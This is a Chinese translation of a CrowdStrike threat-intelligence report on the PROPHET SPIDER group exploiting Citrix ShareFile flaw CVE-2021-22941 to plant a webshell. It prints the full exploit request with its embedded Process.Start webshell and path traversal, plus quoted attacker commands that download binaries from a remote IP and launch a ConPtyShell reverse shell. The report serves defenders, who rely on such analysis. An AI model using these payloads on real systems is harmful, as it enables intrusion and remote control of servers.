先知蜘蛛黑客利用 CVE-2021-22941漏洞傳送Webshell

譯者：知道創宇404實驗室翻譯組
原文鏈接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/

2022年初，CrowdStrike Intelligence 和 CrowdStrike Services 調查了一起事件，在這起事件中，PROPHET SPIDER（先知蜘蛛） 利用了影響 Citrix ShareFile Storage Zones Controller 的遠程代碼執行(RCE)漏洞 CVE-2021-22941，侵入了微軟互聯網信息服務(IIS) web 服務器。黑客利用該漏洞部署了一個支持下載其他工具的 webshell。這一事件明顯表明，先知蜘蛛在繼續利用已知的 web 服務器漏洞的同時，也繼續發展他們的諜報技術。

背景

先知蜘蛛

先知蜘蛛是一個 eCrime 攻擊者，至少從2017年5月開始活動，主要通過破壞易受攻擊的網絡服務器獲取受害者的訪問權，這通常涉及利用各種公開披露的漏洞。黑客很可能充當了訪問代理的角色ーー在多個實例中授予第三方訪問權限以部署勒索軟件。

CVE-2021-22941

2021年9月，Citrix 公布了一個名為 cve-2021-22941的共享文件區域存儲控制器中的相對路徑遍歷漏洞。此后不久，安全研究人員展示了一個該 CVE 的 POC 漏洞。根據已知的技術細節，其他人能夠再現自2021年10月中旬以來擴散的 cve-2021-22941的充分武器化的漏洞。該漏洞允許黑客通過在 HTTP GET 請求中傳遞 uplodid 參數覆蓋目標服務器上的現有文件。

初始訪問和漏洞利用

2022年1月10日，先知蜘蛛使用用戶代理 python-requests/2.26.0向 CrowdStrike Falcon 平臺客戶的 IIS 服務器發送了一個 HTTP POST 請求。發送給 /upload.aspx的請求包含以下命令:

POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123

這個請求有三個關鍵組件。

URI 端點 /upload.aspx 用于 ShareFile 上傳，通常帶有定義上傳對象規范的參數，如 uploodid、 cid 或 batchid。在這個例子中，uploathid 參數包含一個 webshell:

uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}

這個就是漏洞將寫入 ASP.NET 文件的內容。 它使用 Razor 語法，其中@<keyword>允許使用關鍵字作為變量名, @{用于打開 c # 代碼塊。C # Process.Start(cmd,arg);方法提供后門函數，用于執行任意命令。

/../../ConfigService\Views\Shared\Error.cshtml

這是允許有效負載覆蓋合法 Error.cshtml頁面的相對路徑遍歷。

bp=123&accountid=123

這些參數是upload函數所需求的，包含這些參數以防止出現錯誤。此外，這些值與前面提到的公開可用的 cve-2021-22941漏洞中使用的默認字符相匹配。

尋找 CVE-2021-22941漏洞利用的證據的分析人員可以檢查IIS 訪問日志，它的網絡請求如下:

• 目標 upload.aspx
• 在 URL 參數中包含用于../和 ConfigService\Views\Shared\Error.cshtml的編碼字符串
• 如果攻擊者沒有自定義有效負載，則可能包含 &bp=123&accountid=123

一旦設置了 webshell，就可以通過向/configservice/Home/Error發送帶有一個或兩個 URL 參數的 HTTP 請求來訪問它。 ASP.NET 會將這些請求指向 Error.cshtml，它通常包含一個簡單的 HTML 標題，上面寫著“對不起，在處理請求時發生了錯誤”。由于該漏洞，內容已經被 C# 代碼塊替換，并將調使用在GET請求中傳遞的 URL 參數啟動Process.Start(cmd.arg)。

利用后指令

在實現初始訪問之后，先知蜘蛛使用以下命令測試連接性:

CMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net</code

如果成功，此命令將在burpcollaborator[.]net的子域上執行名稱查找，這是開源漏洞測試工具 BurpSuite 可以檢查到并確認響應系統的。

黑客接下來試圖執行編碼的 PowerShell 命令，解碼為:

powershell -Command (New-Object System.Net.WebClient).DownloadFile('http[:]//45.61.136[.]39:443/wget[.]bin','C:\Windows\temp\wget.bin')

cmd /c c:\Windows\temp\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O c:\windows\temp\wi.exe

這些命令試圖從遠程 IP 地址下載合法的 wget實用程序，然后試圖使用 wget下載另一個遠程二進制文件，名為winn.exe。下載winn.exe失敗。然后，對手試圖從 GitHub 安裝一個開源的反向 shell:

powershell -Command IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -Cols 166

這個有效負載試圖直接從 GitHub 加載ConPtyShell反向 shell，參數通過 TCP 端口 4242連接回 IP 地址 107.181.187[.]184。

總結

正如 CrowdStrike Intelligence 先前報道的那樣，先知蜘蛛是一個機會主義的網絡犯罪者，利用公開披露的服務器漏洞，發布webshell。最近的cve-2021-22941利用表明黑客愿意實施新奇的開發代碼，以及他們傾向于部署wget作為操作的第一步。

IOCs

MITRE ATT&CK? Observed Tactics

本文由 Seebug Paper 發布，如需轉載請注明來源。本文地址：http://www.bjnorthway.com/1842/